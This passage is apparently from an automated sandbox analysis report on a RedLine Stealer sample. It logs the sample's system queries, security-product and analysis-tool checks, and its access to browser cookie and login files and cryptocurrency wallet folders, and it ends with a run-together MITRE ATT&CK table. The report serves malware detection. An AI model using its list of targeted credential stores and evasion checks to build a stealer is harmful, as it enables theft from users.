                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,21_2_00007FF8B836F3C4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,21_2_00007FF8B836F478
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_00007FF8B836F8C0
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Documents\LFOPODGVOH VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61E60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79CD61E60
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C5570 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,7_2_0E8C5570
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F4518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,20_2_00007FF641F4518C
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF7948333EC GetVersionExW,1_2_00007FF7948333EC
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB9C.tmp.ssg.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, type: DROPPED
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: DB9C.tmp.ssg.exe PID: 1292, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB9C.tmp.ssg.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts221
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts13
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Credential API Hooking                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Credential API Hooking                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Exploitation for Client Execution                  		Login Hook1012
                  Process Injection                  		2
                  Obfuscated Files or Information                  		NTDS136
                  System Information Discovery                  		Distributed Component Object Model3
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
                  Software Packing                  		LSA Secrets681
                  Security Software Discovery                  		SSHKeylogging122
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp                  		Cached Domain Credentials351
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Rootkit                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Masquerading                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron351
